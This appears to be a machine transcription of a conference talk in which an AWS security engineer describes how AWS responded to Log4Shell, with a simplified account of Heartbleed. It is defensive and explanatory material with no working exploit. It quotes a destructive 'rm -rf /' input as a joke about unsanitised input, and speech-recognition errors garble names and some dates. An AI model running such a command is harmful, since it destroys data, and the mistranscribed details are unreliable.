When security, safety, and urgency all matter: Handling Log4Shell

Good morning. How's everybody doing? You're all very brave travelers for making it out to, to Caesar's Forum on a Friday. Um I and Garrick's is amazing though. Um well, thanks for, thanks for making it out. Uh I hope everyone had a, had a great Re:Invent.

Um so I'm here to do something a little bit different today. Uh we don't often do these kinds of talks. Um so hopefully it's the, it's the first of many.

Um but my name is Abby, I'm a senior principal security engineer at AWS. Uh and I mostly work on security for EC2 and France. So EC2, EBS API Gateway and Amazon Linux.

Um but on top of that, uh along with a handful of other kind of security minded senior engineers, uh I also work on a class AWS team that we call uh Ghostbusters. And so Ghostbusters, we use this kind of a security big red button. So we handle escalations, we help assess the impact of issues, we help se ops. So we'll talk about in a second.

Um figure out what the right path forward is with service teams. Uh and we work with service teams on what an actual fix or mitigation might look like. So in events like log for she, uh we often end up leading the response.

Um so more on that in, in just a couple of seconds, i got really excited about animations by the way, this year. So we'll see if any of them actually work.

Um but before we get into log for shell, it's worth talking in a little bit more general terms, kind of how we think about events at, at AWS. So most event response, whether it's for a security issue or for an operational issue, they take, it takes place on fancy conference calls. Uh and that ends up looking something like this, right? So there's a toss call. So the tech operations call, uh and that's focused regardless of the event type on mitigation and recovery.

Um and notice that you don't see root cause on there. Uh and we've covered that in a couple of other um operational talks, but the toss call, you just focus on fixing the problem, you focus on immediate recovery, you focus on fixing it. Uh and then generally we get to root cause a little bit later.

Um in parallel, there's a second call called the dashboard call and i've called that the everything else call. Um but that's focused on things like customer messaging or the service health, right? So things like dashboard posts.

Um but these conference calls, they're a little bit different right? than a regular work call. So event calls for operational events are run by call leaders. Uh there's only one call leader at a time and they're responsible for kind of all of the tactical parts of the event. So do we roll back a deployment, do we wait out of an availability zone?

Um these calls are also supported by a group called tech operations, which is where the tech ops, the toss call name comes from. Um and they're responsible for kind of event support. So paging other teams and kind of maintaining general order. If you work um at a company like AWS, you've probably heard the, please mute your line while not actively speaking, right? And the, the toss call folks are the ones that uh that are making all that happen in the background.

So on a security call, things work just about the same way. So under ordinary circumstances, um security response at AWS is mainly handled by security operations, so called cops. So these folks are global, they're staffed 24 7. So they follow the sun. So you whenever you send a ticket to AWS security, so to se ops, you get someone that's awake during their day time and on shift, it doesn't mean. And we'll get to that later too that you won't end up paging in someone else, right? But you always start with someone who's awake during their own business hours and is ready, ready to be there.

Um so what that looks like kind of in the normal kind of flow of events is something like this. So you cut a ticket to se cops and it's a potential security issue at this point. Maybe, you know, something happened, maybe, you know, something, there was a potential for something to happen.

Um but it can be by a service team, it could be a customer report, it could be automated through tooling doesn't matter where it comes from, but that ticket gets triaged by setups and then zs they look at that ticket and then they engage escalation where they need to. So in a lot of cases for security events, that might be someone like the ghostbusters, then se ops engages a service team, right?

So the se ops group and the service team, um they work together, they align on what the actual risk might be in any given scenario. They talk about urgency proposed mitigations or fixes or deployments.

Um they work out things like customer communication, right? Do we have to let customers know about something?

Um and then the service team is responsible for completing any of that mitigation, like getting a deployment out uh engaging leadership, right? Writing customer messaging. Uh and then sec ops is responsible for kind of driving that event through to completion. So did the action items get done? Did messaging get approved and then sent, did the fix actually complete? Did we assign coes? Right.

So one of the kind of founding principles right? At, at AWS for how we handle events, operational or security or otherwise is that they're serious until proven otherwise and, and not the other way around, right? You that something is a big deal and then if you can prove that it's not a big deal, then you can downgrade, right? But other than that, you treat everything like it's a big deal right up until you can prove that it's not.

Um, and i think that's really important, right? Particularly in security issues because you get a lot of exercise. First of all of the process, if you're treating everything like it's critical, right? So first you get a lot of practice in the process. So if something like log for shell does come along, uh, it's a really well trodden well exercised path. It's not, it's not scary.

Um, it's just kind of, here's how we normally respond to events. Um, i'm not gonna go through the whole float chart out loud. Um, but this is roughly, um, how we triage an event, right? So it comes in, you make a sort of rough assessment of what is the potential impact here? Is it nothing, right? Like, is it a false alarm?

So lots of tickets come through where it's like i saw on hacker news that this package had an issue. Um, and sometimes there's a really easy first step, right? Which is, we don't use that package and then it's done, right? And we wanna verify, right, you make sure that no one uses that package anywhere.

Um but sometimes they, there's a pretty easy kind of first step where you can rule out how big of a deal that event might be. But when it's not, then there's kind of the second layer that you go through and that's the, the big deal until proven otherwise.

So that might be paging in someone like ghostbusters that might be starting a toss call that might working with builder tools and the service teams to figure out like what the blast radius of a library or a package might be. But generally, you can follow that same kind of series of events for every single type of issue, whether it's a, a log for shell or kind of a false alarm, like nothing burger, right?

Or an operational event comes in as a big deal. You see what you can weed out, you see what the actual real life impact might be and then you can follow the steps accordingly, but sometimes things aren't quite normal circumstances. And it doesn't mean that the process doesn't apply, but it means that how we do it is a little bit different.

So if you take log for shell or something like log for shell and we'll get into specifics in a second. Um ghostbusters might run the event so it comes in through se cops or through a ticket or through a customer report the same way as anything else. But when you get to a point, right where se ops says, you know what i think that actually there, there's, there might be something here.

Um, ghostbusters often can take over that toss call can take over running that event, uh, until we're able to, to kind of get a better sense of, of what the potential risk is. I think this is something that i, i think is really important about how we handle security issues. And i think that's kind of the putting the money where our mouth is on treating everything like a big deal until proven otherwise.

Um, the ghostbusters is a pretty heavy, is a pretty heavy hitting team to be running a toss call. Right. So it's mostly senior principals or distinguished engineers. There's a handful of principles on there.

Um, but it's a big hammer and, and having that group of folks, right, coming in on a weekend or at 2 a.m. to lead a toss call, i think is, is part of what backs up, how seriously we take issues like this, right. That we're putting some of our most senior security folks on the line to, to kind of make sure that everything goes exactly the way that we want to.

And it's one it's good for set ups, right, because they get some back up for things like calling people at two o'clock when maybe they aren't super excited to be to be called at two o'clock.

Um, but it's good for all of us, right? Because you're, you're putting a little bit of the heavy hitters behind, kind of how seriously we take a potential event.

So once, once, once ghostbusters comes in to take over this toss call, um, things that end up kind of shaking out the same general process, but there's a couple of different work streams that happen.

Um, once an event feels like it, it, you know, might, might still be a big deal, certified big deal. Um and that might be things like is there a fix available? And if there's not, we start breaking off parallel work streams, right?

So folks work on fix building and testing a fix while other people work on assessing impact or trying to reproduce whatever the publicly reported issue was. And then in parallel, we have folks that are working on coordinating the event itself.

So paging in teams trying to assess actual impact, tracking progress, right? Once we start figuring out who might actually use impacted package or library and then there's a third parallel track which is focused on communication, right?

So that's like the dashboard call that we spoke about a few minutes ago, but they're working on, what do we need to tell customers? Do we need to get things like security bulletins out? Do we need to get harbingers out or personal health dashboard notifications, right? That you see in your AWS account.

Uh and at some point, all of these threads will end up converging. But being able to parallelize the response is really important because it means that progress on one kind of component of the response isn't coming to a halt while you write messaging or a dashboard notification, you shouldn't be kinda paused on progress for a fix or getting ready for deployments.

So log for shell, right? Or in our, even our our hypothetical examples, they're not the first time that we've had to respond really quickly or you know, where something's been kind of uh all hands on deck, sort of big deal.

So some of you might recognize the little logo that popped up in the bottom. Um so back in 2014, there was something called heart bleed, uh and heart bleed uh was a memory disclosure issue in open ssl

So, this impacted a future in OpenSSL called heartbeats. Heartbeats are for things like keep alive and they let a sender request a specific response from a receiver. The heartbleed issue though will let you get back the payloads and the length plus whatever the buffer was in the memory associated with the length of that response. There was no bounds verification. So if you work on security issues, that's maybe an interesting flag for you, right? We you're not checking how much memory should be returned with that length. And not verifying things leads to all kinds of really interesting issues. So that was part of Log4Shell as well. But ultimately, Harpley let you return a payload with a really large length and return the corresponding kind of chunk of a memory buffer. And because this was memory that OpenSSL had used previously, you could get all kinds of fun stuff this way - private keys, user names and passwords, certificates. And importantly, right, hopefully let you continue to kind of hang out and eavesdrop on whatever your target was until both the bug was patched, but also all of the associated material had been rotated.

So simplified though, Harple ends up looking something like this. So my initial request, right? I might say "Hello, so give me back this phrase 'Open Sesame' if you're listening" and I expect "Open Sesame" to be 10 characters long. And in a normal TLS heartbeat request, right, I'm listening and it sends back "Open Sesame". With Heartbleed, I can say "Hello, say 'Open Sesame' if you're listening", open sesame is 100 and 22 characters long, which it's not - counting is hard on the Friday after re:Invent - but it's not 100 and 22 characters. And what I get back is "I'm listening Open Sesame" and then whatever the 100 and 22 characters were from memory, right? So in my case, "user beetle", "an administrator wants to set the server master key to admin", "user Eric wants to set the user password to hunter1".

And you'll notice from just this example, right - and this is simplified but Heartbleed was simple. Heartbleed was simple. It was simple to use. It was simple to get back interesting things. And that's part of what made it such kind of a mad scramble for folks on the internet, right?

So for AWS, we had to hot patch ultimately - two line fix - but millions of deployments. And we did this in hours, but at night, right? So at night, two line fix, millions of deployments and for the first time, right, we scanned the entire Amazon EC2 IP space. So we could send notification emails to every potentially impacted customer. If you've ever received an email like this, right, it is chaos because we err on the side of potential and not definitively impacted. So generally when we're sending notifications to customers for things like this, we're saying "Hey, there's something out here. It might, it might be something that impacted you. Go ahead and look." So we're indexing on how can we give people the earliest possible warning, right? Even if it means it's a false positive.

For more info on Heartbleed, Colm McCarthy did a tweet thread on the Heartbleed divers back in 2019 on how we handled the actual hot patching and deployments and customer messaging. That's on Twitter. So I recommend checking that one out if you have some follow up questions.

But even Heartbleed, right - that's not the end of it. And over the last kind of decade, right, we've had an increasing number of kind of mad dashes like this. What was unique about Harley and Log4Shell now known as Log4J, right? What was different about those is that they were easy, they were easy to exploit, they were easy to take advantage of. There was no like special microarchitectural knowledge required, right?

So a lot of in the last couple of years, what we've seen has been things like side channels, those are not as easy to exploit, right? They require having generally some amount of specific knowledge. It's fairly specialized, it's generally not super easy to take advantage of things like microarchitectural side channels or timing side channels, right? And Harley and Log4Shell, they weren't like that, they were really easy.

But some frequent flyers, I think that we've that we've spoken about probably a number of times and I think our those logos are probably familiar to a few folks sitting out here. But so far, right, we've mostly covered just what the reactive part looks like - when a ticket comes in or when a potential report comes in how do we respond? But there's a proactive element here too, right? Both being able to know when something might be coming or when you're able to identify when something might be exploited.

And the reactive part I think is often what's interesting, right? Like that's the event part. That's how things like "How did AWS handle Log4Shell?" But there is a proactive element too because that proactive element is how we don't do this more often. I had fun responding to Log4J but I'm not sure everyone wants to do that every week, right?

So the proactive development element is just as important - can we predict when something can happen? So more often than not, we think that we can and a lot of that is just kind of detective work, right? So you're looking at a CVE feed or a mailing list or researcher reports or papers that folks write for conferences, there's all kinds. But ultimately, it's just kind of poking around, it's reading reports, it's looking at a feedback loop, it's seeing "Ok, so I learned about this one thing two weeks ago and now this new report is out. Can I do anything with both of those? Does it go from being kind of one not that exciting issue to a really exciting issue with information that I know now?"

And a lot of that, a lot of the security teams call that things like pivoting, right? So from the information that I have now, what else can I get? And if I can get information from kind of step one, what can I use the information that I got from step one to find something at step two that maybe is a little bit more exciting?

And those different data sources, right, are what makes things kind of long term interesting. So with something like Heartbleed or Log4Shell, can we figure out whether something was exploited? Right? And it's harder, some issues are harder to tell whether there's any sort of like little breadcrumbs. So one of the industry phrases for this, right is indicators of compromise - so an IOC. Can we find any kind of bread crumbs that something might have been taken advantage of?

And what's interesting for some of these kind of bigger issues - side channels or Harpley or Log4J - it's not always really obvious. So you're putting together a lot of secondhand breadcrumbs as well.

So to our friend Log4J, so before anything even kind of kicks off, what was Log4J anyway, right? Why did this end up being such a big deal?

So there's two kind of characters here that I think are important for this conversation. So the first is Log4J itself. Ultimately, it's a logging library for Java. Lots of people use it and we'll get to that in a second. But Log4J, it lets you log different levels of information from inside your application - so that could be something like user input or an HTTP request.

So JNDI - so the Java Naming and Directory Interface, right? This is the other kind of component in our cast of characters. So it lets Java applications look up things like an object or a name at runtime. And there's some functions for JNDI out of the box, right? So DNS or LDAP.

So Log4Shell, I think we now know a pretty solid timeline here. And I think if you're looking at these up on the very large screen, you might notice a couple of the pieces that stick out for you. And notably, it's that the initial report of the issue that led to Log4Shell, right, was November 24th. And a lot of folks had different responses here, but if you - how many of you responded to Log4Shell on November 24th? Yeah. So I think you'll see on the timeline, right, as well as like what happened in real life, that not a lot of folks were doing anything on November 24th. We were living a very different lifestyle.

And we'll go through this whole timeline in just a second. But the place we want to start is November 24th, right? And that's kind of where our story picks up. And that's when Alibaba reports the very first Log4J issue that we now know as Log4Shell to the Apache Foundation - so the maintainers of Log4J.

And this is it, this is the first one. And basically, right, you can use parts of the JNDI tool - so the Java Naming and Directory Interface - and it doesn't kind of control against input that you don't want. Basically. And what that means in kind of plainer terms, right, is that if I can control log messages or if I know that messages passed - parameters passed - as part of a logging message, if I know what you're doing with those, I can use them to execute arbitrary code from wherever I am, right? So remote code execution.

So this is what that looks like, right? So really simplified, I can use that JNDI lookup feature to execute code. So I can pass things like an HTTP request that I know will get evaluated - so looked up, right? And then logged at runtime.

So ultimately, what Log4Shell came down to is those inputs weren't validated. And I think a lot of folks have seen the "x=rm -rf /" comment, right? Where it's like, and I hope you've learned to sanitize your user inputs. No, we have not learned to sanitize our user inputs.

And ultimately, that's what this looks like, right? So a lookup something like the super secret key and the JNDI lookups exactly the same way. However, we've made a lot of tools in general, right, for software that are to make our lives easier and that's things like remote lookups. And I don't necessarily feel like in this case, remote lookups ultimately made my life easier, but in general, right, for day to day development they do.

So that's a little bit about what this looks like, right - that's what a remote lookup with a JNDI plugin would look like.

So on November 29th, right, the Apache Foundation publishes the 1st and 2nd fixes for that original issue that was reported by Alibaba. And if you work on a lot of security issues, you'll notice that they look a lot like this in general, right? The fix for this, the commit message for the patch itself - it's pretty boring, right? There's some trigger words in here if you read a lot of these, but it's basically saying "Hey, don't worry about this. We just don't format lookup by default. No big deal, don't worry about it."

But for November 9th, when Apache published those fixes, until the first tweets started appearing on December 9th, it was pretty much under the radar. They don't get a lot of attention. There was some activity later that we now know on some forums, most of which I could not read.

Um, but these are pretty casual. You don't get a lot of, you don't see a lot of attention, but where things start to pick up is December 9th. And for us that's kind of like log for shell day one, right? This is when everything kicks off. So what this looks like on the on the AWS side.

So at around 7:40 Pacific time, the first kind of the first Twitter mention of a potential log for shell pops up. This isn't ultimately the 1st 1st, but it's the first that like picks up kind of general publicity. So general steam and this catches people's attention, right? For a for a couple of reasons.

So one, it references an RCE, right? So the remote code execution and it doesn't specify a specific version of log for J, right? And usually if you write messaging for security issues, you wanna scope it down as much as possible. This doesn't do that. This just says log for J, right? And it says log for J two and we'll talk about that in a second, but it doesn't specify like a point version, not like log for J 2.08 right? It just says log for J two and we have bonus points here.

And that log for J is incredibly, incredibly wide. A lot of people have log for J and it's one of those things that's kind of a little sneaky, right? And that it's, it's the dependency of a lot of other tools. So it's, it's in a lot of places. So at 7:40 when he sees this tweet, um Mark, so Mark Brooker cuts the first ticket to Ghostbusters and it is pretty vague, right? This is the first one that, that, that we started running the event out of and there's, there's a couple of others that we found then a little bit later of folks that had seen a forum post or someone had sent them a Slack message, but this is the first one that kind of triggered. Uh this might be a five alarm fire sort of situation.

Um and then you can see this is from Mark Mark's actual ticket. I don't know any more about this than what the tweet says. If this is true. A log for jr ce could be a pretty big deal. This is called foreshadowing. Thank you, Mark. And this is actually really interesting, right? And it's actually important because we don't actually know at this point if this is true possible. Anything, we don't know if this is like a this is a, nothing like it could be anything at this point but, and we now know right more foreshadowing it was not a false alarm, but we treat these like they're a big deal otherwise.

And I've already spoken with Mark about this, not a stellar security report, but we, we work with what we have. So at around 11 column, notify steve. Um, and you'll notice that that's actually that's a pretty short time window from telling the from the first kind of we don't even know ticket coming in to telling the the most senior security person at amazon really short window, right?

Uh at about 3 p.m. pacific time, there's the first formal briefing for the rest of uh AWS senior leadership. And ultimately, we ran these briefings twice a day for the first, probably 10 days uh of the log for j response, which is expensive by the way, especially on holidays. They don't love that. Guys. Animations are awesome.

So at around 11:48 Pacific time again, um i apologize to my, my coworkers who don't run in pacific time, but it, it was the easiest for an in person conversation and i'm sure i'm gonna get a lot of messages about it, but at around 11:48 right? So not long after that first ticket comes in and just about 48 minutes after column tells steve our first set of mitigations roll out and that's, that's a couple of the ones we, we started with, but this was even before we started to understand the full picture and these were proactive and these were a big swing at. If this turns out to be a big deal, what can we stop before it becomes a big deal?

So this is a set of traffic filtering rules. And the goal here was to catch any potential exploit attempts, what we thought an exploit attempt might look like. So these are request matching patterns uh that can be kind of ingested by tools um like wf so uh web application firewall, and we ended up iterating on these rules and lists of patterns throughout the, the whole beginning part of the response. But that's where we initially started.

So at 122 ghostbusters starts the first to call, that's me. Um and in the end that actually, by the way, that icon is what i use on my actual phone for toss is the little skull. i think that's nice. that's the right message. Um but at the end that first call, so the first one that we started on the very first day, it doesn't stop for three days.

So at a little bit later that first, right? So ryan schmidt from builder tools uh proposes the first internal patch and this just removes the jini look up class entirely, just blows the whole thing away. This is also foreshadowing. Uh but this is incredibly smart by ryan and it ended up paying off in, in big ways for us, right? And it was really important for the rest of our response. But ryan made the assumption from the beginning, we almost always find new issues with an issue that's reported like this. It's never just the initial report. Someone always sees that little breadcrumb and says i should poke more at that. I should poke more at that. I should poke more at that. And before you know it, you're fixing hypothetically four additional cv s.

Um so we blew it away on the first day. So right about now we start doing our internal builds, the aws fleets for what it's worth are very large. Um so this is, this is a big process. Um so about 148 build start. Um and we keep those same kind of traffic filtering rules in place.

So at around the same time, right on the toss call, we decide, well, we're here, we should also just get v one and you'll notice it back in that original tweet, right? It just said v two and in the, you know, in the spirit of better safe than sorry, right. So just like disabling that entire class from the beginning, uh this also pays off. So we just decide to extend the mitigations to v one and v two even though at this point, we have no indication that v one is actually impacted.

So we talked a little about this in the abstract. But typically the event response kind of follows a really standard pattern for, for AWS. So the first one mitigation stop the bleeding. Can I prevent an issue from getting worse or can I prevent new occurrences right from happening? Second detection, can I tell if this happens again? If, if someone is can exploit this, will I know are there warning signs? And next is prevention? Do I know what the root was? Can I close whatever gap led to this issue happening in the first place? And then the very last step is clean up, right? Can I identify and fix any existing impact? Can I fix what's already happened?

And at this point, we have our kind of initial mitigations in place and we have a patch that's under review right from ryan. Uh and it's time to look at what the kind of long term detection looks like. And that means that our next question is if there are attempts to leverage law for she, can we catch them? And we think so.

So we spin off a handful of a wl security teams at this point to start to look at this. And this is roughly what that looks like kind of again at a really high level. So first of all, if our patches, does it catch everything, do we even know what an exploit attempt would look like? And then if we know what an exploit attempt looks like, if we know what an ioc is. Can we use that as a pattern to find them with anything similar? And then you can pivot from there again and say, are there common ip s are people trying to exploit that? Are they coming from the same place? Do they have something else in common? Like their formatting, their, their attempts or quests in a similar way? Right? Because you can often track those down to the central source, right? That someone posted um a proof of concept online or they posted a tool for trying to exploit lo for shell online.

What else do those ip s do if they're trying to exploit larochelle, what else are they up to? And then you can keep feeding that cycle over and over and over again. And this is one of the first branches off of that main call and actually the work from this, i hope that they, they do a talk on this at some point just on its own, but it ends up being incredibly cool. This work is incredibly cool and by the end of kind of the initial kind of first period of event response, this tooling that was created on the fly on one of these offshoots of the main call blocked over 2 billion attempts to leverage the log for shell issue um against AWS services.

And the team is that's is able to do this by working on things like internal java profile data. A number of our kind of existing threat intelligence sources and it let us kind of identify and proactively block traffic that might have potentially led to an exploit.

So at this point, we've got our mitigations in place. We've got our pat under review, we've got our detection happening and we wanna roll on to actual prevention. So what can we do with the information that we have?

So at around 3:30 we start mass deployment prep for AWS teams. So this is with the built patch that we talked about from, from Ryan. Uh again, AWS is a, is a large place. So these fleets are in the many, many, many millions. Um and building this many, this many, this many environments briefly gives the build system the hiccups.

Um and in parallel work starts on a campaign. Um so campaigns are what we call but things like um mass waves of tickets. So how do we notify teams that there's an action that they need to take potentially, that's an emergency? So these tickets go straight to service on calls. So people get paged uh and then instructs them to once, once patches are built, they need to work out, getting deployments out to their services as quickly as possible.

Um this is the first of many, but this is what the first uh I highlight from the, the first campaign looked like. So I've mentioned a couple of times that AWS is very big, right. What happens when you have to prioritize work across so many services and some of you might remember, right, that like things at the holidays always have a little bit of an extra element to them, right? People are on vacation, people are traveling.

So for and we can talk about this a little bit later too and i think both colum and david janacek have covered it in talks this week as well. Um but we also have things like change control. So that's things like not pushing out a lot of deployments when people are trying to get their holiday shopping done. Hypothetically, right. So there's work that has to happen when we have to prioritize this much work across this many teams

And it was really clear at this point, right, that we've blown away the whole class and we're going after v one and v two. So the approach here at this point is basically you patch everything, even if we don't think that there's a chance that this could actually be an issue. Even if we think all of the other mitigations are sufficient, it doesn't matter, you have to patch anyway.

But there are some constraints, right? You can't just kind of patch everything right out of the box. So the first is people, we have limited people, people are on vacation, people are on holidays, people were on call for things like December 7th availability. We can't take any availability risks even though we have to get a lot of work out for a potential security issue and this is kind of an ever an evergreen bit of tension, right? So you always have to weigh security versus availability.

So our thought process here ends up looking something like this, right? We wanna balance urgency with risk. So urgency with availability or with what we think, you know, the potential impact for a service would be. So the first one, we prioritize network connected services that directly take customer input. We also prioritize things that have extremely large fleets. So things like E2, um we also prioritize services that we know take a little bit longer for for deployments. So that's things like state services that have particularly strict durability requirements. So like EBS uh and we also prioritize in that first wave dependencies that are common between many services if anyone's ever gotten a ticket right, to patch something or to do work on a service to find out that one of the underlying dependencies hasn't been fixed yet, right? It's not a great experience. So we have to make sure that we can identify those early dependencies.

1st, 2nd, we go after network connected services that don't directly take customer input. And we go after container images and lambda functions, right? Or network connected internal only services. And that leaves our third wave for non network connected services or things like developer desktops or test environments or not very common dependencies and this all helps kind of control what the load on people and systems and services ends up looking like.

But just the coordinating here is a massive effort, right? So this means engaging tens of thousands of resources and tickets and with resource, i mean, humans, right? Tens of thousands of tickets, you're paging tens of thousands of humans, right? That is tens of thousands of on calls of people that were paged and woken up and we've asked them to do work and all of those folks are gonna have questions, right?

So running a good campaign like this means also having good documentation. So are there clear and easy to follow directions for resolving the actual issue? That means if i'm paged at 2 a.m. does that page say specifically what i need to do? Is it easy for me to follow if it's my first time? God bless me on call for a service. Can I follow the instructions in that page? Is there a clear wiki? Is there a channel where i can go to get help? Um and for most of this event, right, we ran a number of support channels that ended up being staffed by folks like builder tools or se ops or amazon linux or the jdk folks and these channels were busy. Um this is not the peak of one of the channels. This is just when abby remembered to take a screenshot. Um but this is a massive effort, right?

And so on top of the folks that you're engaging as on calls, that means who's working the support channels, who's staffing all the questions who from builder tools is, is working at night in case the build system has an issue. So at around 7 p.m. change control takes effect. So to handle the the the volume of upcoming builds and deployments, uh we implement change control and that basically stops all other builds and deployments to prioritize work for lo for j uh generally, that means that you have to get pretty far up into senior leadership to get approval to something that's not relevant, right? So to do in this case, to de and often that means nothing, right? So for a lot of things for a lot of change control, it means there are no deployments and in this case, it means only log for j only log for j builds and deployments are going. uh and we actually went in and stopped all of the other work. So we stopped people's builds for them if they were not log for j related um all of this work, right? So we're, we're making a very conscious choice that like this is important and we are going to make sure that it is protected because it is important, right? Um so we'll go in and take action for folks.

I don't want 8 p.m. the the team that's responding to the event. So in this case, it is ghostbusters, right? We start to engage large teams directly and this one is me. Uh but one of the kind of the benefits of having really distributed teams as in cape town and seattle are just about as far apart from each other as you could possibly get. Um we start contacting the large fleets so easy two is still mostly split between seattle and cape town. We have folks in, in dublin, we have folks in new york but the the vast majority of like the ec2 control plane services, things like run instances. what happens when you launch an ec2 instance, those folks are in cape town. So we take advantage of this, right? And we totally monopolize the build system during the cape town daytime, which is seattle's night time. So ultimately, the vast vast vast majority of amazon ec2 services patch that first night while seattle is asleep, december 10th. see we're only still on the first day. well, this is the second day now, it was a big day.

Um so love for shell day two, just a quick hack. So seattle comes back online the next morning and at 2 a.m. volker simonis from the coretta team um had tweeted a log for j hot patch that let you in a hot patch. in this case, it let you patch a running jvm without a restart. So to patch in place for posterity, that is the original tweet then the new permanent home of the hot patch would ended up hanging out with everyone for quite some time.

Um and then the, the very first internal proposal. So on the 10th at around seven, right. So the seattle crew is back on shift. We worked all day in the ninth. A couple of us got a couple hours of sleep. We're back online and we wake up both to that volcker has tweeted his patch and that s3 has been testing in earnest uh to see what they can do with the live patch alongside the main one. And at this point, we decided that we need to fork our efforts a little bit and that we'll split off a group to look at what can we use this live patch for in parallel to the regular patch and then we keep the existing group going on. what kind of the main patch is the, the standard patch? So we're moving that whole class at this point, right? And folks that respond to security issues might have also seen this. But the stuff i do is easy responding to the initial security event, figuring out what's happening. That's easy. Everything else is hard.

There are so many pieces here to responding to an event that are not the initial with. Oh my god. Look at cv e. It's, it's rated 9.8. That stuff is easy. The stuff is hard and that's things like, do we know how to report on pro progress. How can we tell when we're done? Have we gotten all the dependencies is the build system? Ok. Have we tested all of this? It's an incredible amount of kind of unseen secondary work that goes on or the response doesn't stop at that first house call.

So at 11, we start kind of the second wave of big deployments and all log for j all log non log for shell builds and deployments, they're stopped and this is now for the second wave and then just like that diagram that we just looked at at around 1130. On the 10th, we get to the, we have a patch. Now, what stage of event response? Aws is big. So making things happen requires some special skills.

So at this point, we engage, we engage laura, right? So how do we get things moving in the right direction? How do we track dependencies and progress and blast radius? But you can't catch a breath because at around 7 p.m. the second log for j cv e drops. And this says that some non-standard configurations are still vulnerable to an r ce if they use the jd bc pender with lda, basically, since we removed the jin d look up class entirely, this was covered in our existing patch. So aws is not impacted at this point, we have our two parallel work streams going.

And on the 11th, we start to look at rolling out that hot patch. So that live patch from volcker uh at the same time as the main patch. So we've worked on this at this point for a couple of hours and we think that we have a safe strategy to roll out so many parallel deployments. Um and at around 3 p.m. we start picking up speed. So the way that deployments work at aws is that we, we never roll out to multiple regions at the same time, right? It's a safety mechanism. Um so after by 11, we started testing some regions, we started rolling out the hot patch and waves alongside the regular patch. Uh by 3 p.m. it's, we've seen that it's safe and that it, we don't see a big impact. Um so we've made it through multiple regions. So we start pushing the hot patch out in, in earnest.

And now that we have laura kind of on the job for helping us figure out all of the hard things like how do we know when we're done? Um we start looking at things like stray dependencies, stray ecs tasks, developer desktops. Um and that, that ends up in our third wave of tickets and it's mostly at this point for ecs tasks. So if you've run ecs before uh tasks are what has like the associated container definition with it. Um so what's inside my, my container that i'm running on the u cs elastic container service?

So our hot patch roll out though does cause a brief issue. Um so in some cases, uh ro and caused some small transient spikes in latency. And it's worth noticing at this point that we didn't ask teams to deploy the hot patch on their own. So we did it for them. This is really unusual for us, right? Generally, like teams at aws, they are responsible for doing all of this work

They, they have to get out the the patches and the deployments to their services. And in this case, teams are still responsible for that main patch. But for defense in depth, we deployed the hot patch in parallel on their behalf. So at the same time, so from the 11th to the 14th patching work kind of continues, we track down some stray task, we track down stray functions, we fix developer desktops and then it's time to start looking at our our kind of our fourth step, I've patched and now what do I do? So at around 7 p.m. right, we start kicking off what follow up investigations look like for service teams. So we split off again another separate thread from the main group um to start helping service teams with investigations. So that's guidance for how teams know when they're done. That's to help them pull their service and application logs and that's to help them sort through any of that data that we get to see if there's any new information that we can use to drive more mitigations or detections.

Lambda, how many folks use? Lada? So lambda was an interesting one. Lambda doesn't include locker in any of its managed runtime. So any of the base container images but lambda customers do so. On december 12th, we make a change to the lambda manage runtime that will basically pull the hot patch in to mitigate the issue for customers. So this means that if you're running a v that if you're vulnerable as a customer and you're running an effective version of log for j. Um this change is patched for you automatically. This is also for what it's worth is, is unusual and that's part of kind of how compute shifts, right is that it's not always the same that how folks run an ec2 instances is not quite how things work for someone that's running lambda or containers. Um and it was something i think that would ended up being really important to, to customers is even though the base configuration i got from you, folks doesn't have log for j i'm still impacted and we can't just leave customers there because it didn't come from us, right?

So on december 14th, another log for j cv e actually two. Um so the first one is basically that the original patch spoiler alert was not complete in some non-standard configurations still. Uh security people love by the way, saying non-standard configurations. So it basically means out of the box, don't worry about it. But like if you did this other thing maybe, but basically r ce was still possible in some non-standard configurations. And then again, in some non default configurations, if you were using j ms app pender and someone had right r ce was still possible. Um aws is not impacted by either of these because we blew away our friend, the gnd look up class on day one and because we included log for jv one from the beginning. Uh this is a good foreshadowing again, i thought because by december 14th, the internet has verified for us that log for jv one was actually infected.

Later on the 14th, we end up publishing that hot patch r pm. So we've, we've produced basically a package that other folks can use of the internal hot patch. Um amazon linux one and amazon linux two are not impacted by log for shell out of the box, right? we don't, we didn't ship those versions of log for j but some customers do. Uh so on the 14th, we published that r pm. Uh so amazon linux customers can use it as well.

On the 17th, it is our last and final for this exercise uh log for shell cbe. So this is the last one and this basically says that for some conditions, uh a denial of service. So, ad os is possible through our friend from computer science 101 recursion. Uh aws is not impacted um so on the 17th, amazon linux. So one and two start applying the hot patch by default to install jd case. And then we publish an apt repo so that folks using debian or ubuntu can use it as well that aren't on, that aren't on amazon linux. And that i think is kind of the, is the end of our initial response, right?

So we've had five cv es. We've started basically uncountable numbers of, of parallel threads for our deployments and hot patching and regular patching, leadership updates and customer messaging.

Wh so what went well, what didn't go well? So starting with the bad, there were some less successful elements here. So the first one is as we were kind of figuring out how to get these changes rolled out for teams. There were some rocky bits, especially in terms of communication. So namely if you were just a team receiving a ticket and you were seeing the public information around additional cv es. Um we didn't do an amazing job, internally publishing. We're not impacted, we're not impacted, we're not impacted. And that made the response a little tricky for service teams as they were trying to parse that information that came through on the external side.

We were inconsistent with providing our customer messaging. We got a little distracted by the internal work. Um and i think we were a little slow getting customers, some of you might have noticed and getting some customer bulletins out around what services were impacted or not or as a customer, what action you had to take.

Um, we had some roll out snags with the hot patch. So those latency blips for lambda, um and we already, we briefly covered this, but deploying things on behalf of teams is really unusual for us and that definitely caused some confusion for teams as they were trying to figure out. Well, but if you're rolling out the hot patch, do i still have to do things? Do i still have to patch? Do i still have to deploy? How do those things work together?

And lastly, our tickets often went right to service on calls and those folks weren't necessarily familiar with log for shell. They weren't necessarily folks that usually responded to security issues. A lot of them generally get paid for things like operational issues. Your service is returning some weird errors, right? Uh and in a lot of cases, we know now that we should have gone directly to people like principal engineers or managers, right? So the folks that those on calls ended up having to escalate, escalate to, we could have gone straight to them, but there was some really, really cool winds here on top of that.

So the first one right, ryan removing the entire jin look up class and assuming that log for jv one was affected from the beginning, huge, huge win by ryan, right? That was incredibly smart and also paranoid and delightful. Um so a big, a big thanks to ryan on, on that one.

This is my not to scale illustration of what defense in depth looked like. Um but i was really proud of how, how defense in depth ended up working for large forel here. We had both the hot patch, the regular patch, things like those waft traffic filtering rules and then we had the proactive blocking of potential exploit attempts.

